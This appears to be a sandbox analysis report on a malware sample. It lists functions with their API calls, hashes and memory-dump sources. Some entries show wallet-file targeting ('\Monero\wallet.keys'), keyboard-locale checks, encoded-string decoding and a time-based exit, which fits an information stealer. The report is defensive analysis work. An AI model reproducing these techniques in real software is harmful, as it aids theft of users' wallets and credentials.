                            • Opcode ID: b2ff313beb7f8dfa0807aa5258e3bca6d6f120e11db599102b04a2aaa685aa0a
                            • Instruction ID: 024fb0c7decf186db98473c17ddf229dbddc4c00466ccb89c85be28526aaabba
                            • Opcode Fuzzy Hash: b2ff313beb7f8dfa0807aa5258e3bca6d6f120e11db599102b04a2aaa685aa0a
                            • Instruction Fuzzy Hash: 7D1203B1A1011C9BCB15FB60DC55EFE7378AF55340F4041A9B60A62492EFB06F8ADF91
                            Function 000EDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00100C2E), ref: 000EDE5E
                            • StrCmpCA.SHLWAPI(?,001014C8), ref: 000EDEAE
                            • StrCmpCA.SHLWAPI(?,001014CC), ref: 000EDEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000EE3E0
                            • FindClose.KERNEL32(000000FF), ref: 000EE3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 3bfddcbbf3d9d3ce68513b4232728a78ff680493a8eeb77c7f94be59101303b5
                            • Instruction ID: 4c66cc343abe02131b960cda3ce6c73730484c5ce8b12bac0f2956024f64dfe4
                            • Opcode Fuzzy Hash: 3bfddcbbf3d9d3ce68513b4232728a78ff680493a8eeb77c7f94be59101303b5
                            • Instruction Fuzzy Hash: E5F1E0B191411C9ACB25FB60DC95EFE7338BF55340F4041EAA10E62492EF746B4ADF62
                            Function 000EDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001014B0,00100C2A), ref: 000EDAEB
                            • StrCmpCA.SHLWAPI(?,001014B4), ref: 000EDB33
                            • StrCmpCA.SHLWAPI(?,001014B8), ref: 000EDB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000EDDCC
                            • FindClose.KERNEL32(000000FF), ref: 000EDDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 9de0f5c71cdac70198cfccedef5b4d655d1006ff18f818d5f6c14b8989a4249b
                            • Instruction ID: b25274a8673fd4a625a752b3425a2118993948f413532d5920750e0c7e12d79c
                            • Opcode Fuzzy Hash: 9de0f5c71cdac70198cfccedef5b4d655d1006ff18f818d5f6c14b8989a4249b
                            • Instruction Fuzzy Hash: 319158B2A002089BCB14FB70EC56DFD737DAB85340F408559F90A96592EF74AB0DDB92
                            Function 000F7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,001005AF), ref: 000F7BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 000F7BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 000F7C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000F7C62
                            • LocalFree.KERNEL32(00000000), ref: 000F7D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 23ceca8c9d4b6bbe59d3d52cb9470d174db9dce8c861cd18e091b8e71675176c
                            • Instruction ID: ac78c1a61c97868698eafa58a1f0f6378411c435b9a3ced23b6ae6d81e04cf54
                            • Opcode Fuzzy Hash: 23ceca8c9d4b6bbe59d3d52cb9470d174db9dce8c861cd18e091b8e71675176c
                            • Instruction Fuzzy Hash: 20415EB194021CABDB24DB94DC99BFDB778FF48700F204199E20962591DB742F86DFA1
                            Function 004B6380 Relevance: 10.3, Strings: 7, Instructions: 1597COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: J_i$2[g|$Z}x$Z}x$[Ew$[LW?$7{^
                            • API String ID: 0-1365447716
                            • Opcode ID: f6656bfce4769cd05fe9652cc4b9350963e7e0ea2108838d70be2c325eaa34fb
                            • Instruction ID: ab3af62a9471d5e25b54d0ba3907a048ccc185878640f6b43f9317100aeb6d1f
                            • Opcode Fuzzy Hash: f6656bfce4769cd05fe9652cc4b9350963e7e0ea2108838d70be2c325eaa34fb
                            • Instruction Fuzzy Hash: 02B217F390C214AFE3186E2DEC8567AFBE5EF94320F1A453DEAC583744EA3558018697
                            Function 000EE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00100D73), ref: 000EE4A2
                            • StrCmpCA.SHLWAPI(?,001014F8), ref: 000EE4F2
                            • StrCmpCA.SHLWAPI(?,001014FC), ref: 000EE508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000EEBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 4ebc29c2a64d595e1afd215a66ce26a204bae9fef6efa681526c45e340a40b42
                            • Instruction ID: e538869a3d2b6f33d8cb93c7d7ac0b65d4d7637a9629240d2b1ea375bf658aef
                            • Opcode Fuzzy Hash: 4ebc29c2a64d595e1afd215a66ce26a204bae9fef6efa681526c45e340a40b42
                            • Instruction Fuzzy Hash: 791253B1A0011C9BDB14FB60DC96EFD7378AF55340F4041A8B60E56492EF746F4ADBA2
                            Function 004AF68D Relevance: 9.1, Strings: 6, Instructions: 1590COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (1?V$CL~]$LEo$l)5+$s4w?$,T~
                            • API String ID: 0-171742306
                            • Opcode ID: 2759c16c29ac94a1079a6baa46463d45de05514e655e03cac32f25c98f337802
                            • Instruction ID: 2852d30dbc878ad0f7acfb146d52124cf7123175cdf4e990869d2462a5a28c95
                            • Opcode Fuzzy Hash: 2759c16c29ac94a1079a6baa46463d45de05514e655e03cac32f25c98f337802
                            • Instruction Fuzzy Hash: C8B2D4F3A0C200AFE3046E29EC8577ABBE9EF94720F1A492DE6C5C7744E63558418797
                            Function 004A74C6 Relevance: 8.5, Strings: 6, Instructions: 1045COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: N!tW$^~~w$ro$u1~}$1qo$I>3
                            • API String ID: 0-2792040503
                            • Opcode ID: 635f76e41c1253bc0c98297f8ed28d16cd44220851abff2fd7c83ae277ca9659
                            • Instruction ID: 1c8befa35990799c0b274715843135ec459d8272a251a399d182b348cb206edc
                            • Opcode Fuzzy Hash: 635f76e41c1253bc0c98297f8ed28d16cd44220851abff2fd7c83ae277ca9659
                            • Instruction Fuzzy Hash: 417215F360C6049FE308AE2DEC8577ABBE6EF94720F1A453DE6C5C3744EA3558018696
                            Function 004B7E77 Relevance: 7.9, Strings: 5, Instructions: 1621COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: D<?$NvW?$kz1s$u0/m$UG
                            • API String ID: 0-2516944264
                            • Opcode ID: f95cbc7e7a3da8aca46a7461a86a2a489c2ad7d4ab31e3092de9d437c42457da
                            • Instruction ID: 6f1c5458d3f102629e967ad1100096408ba8bf17e1554b6338979368d83616a4
                            • Opcode Fuzzy Hash: f95cbc7e7a3da8aca46a7461a86a2a489c2ad7d4ab31e3092de9d437c42457da
                            • Instruction Fuzzy Hash: B3B227F3608204AFE3046E2DEC8567AFBE9EFD4320F1A453DEAC4C7744E93598058696
                            Function 004BCD23 Relevance: 7.9, Strings: 5, Instructions: 1612COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 8RO$Jsm$Q)\$l[zj$}[_
                            • API String ID: 0-1192714827
                            • Opcode ID: 039cd8c405f313ab1643bca29cf80eb8ec5b198244deef8bc88c73780fb37c3e
                            • Instruction ID: c0e496a6d473d5e3ecfc5fb62525a114694bf1989f895e152461480b5a33a7a4
                            • Opcode Fuzzy Hash: 039cd8c405f313ab1643bca29cf80eb8ec5b198244deef8bc88c73780fb37c3e
                            • Instruction Fuzzy Hash: 00B2F5F360C6009FE304AE2DEC4567ABBE5EFD4320F1A892DE6C5C7744EA3598058697
                            Function 000EC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000EC871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000EC87C
                            • lstrcat.KERNEL32(?,00100B46), ref: 000EC943
                            • lstrcat.KERNEL32(?,00100B47), ref: 000EC957
                            • lstrcat.KERNEL32(?,00100B4E), ref: 000EC978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 628ce4b21be69d48481d6b92b40a1b4932556ee233de363fde60032ee37f8f49
                            • Instruction ID: db071dde760fb9a2fc934d6b57ade43c45bfbd6459dda0e95cc46b9b89ced5a3
                            • Opcode Fuzzy Hash: 628ce4b21be69d48481d6b92b40a1b4932556ee233de363fde60032ee37f8f49
                            • Instruction Fuzzy Hash: 5A4170B990421ADFDB20DFA4DD89FFEB7B8BB48704F1041A8E509A7280D7715A85CF91
                            Function 000F6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 000F696C
                            • sscanf.NTDLL ref: 000F6999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000F69B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000F69C0
                            • ExitProcess.KERNEL32 ref: 000F69DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
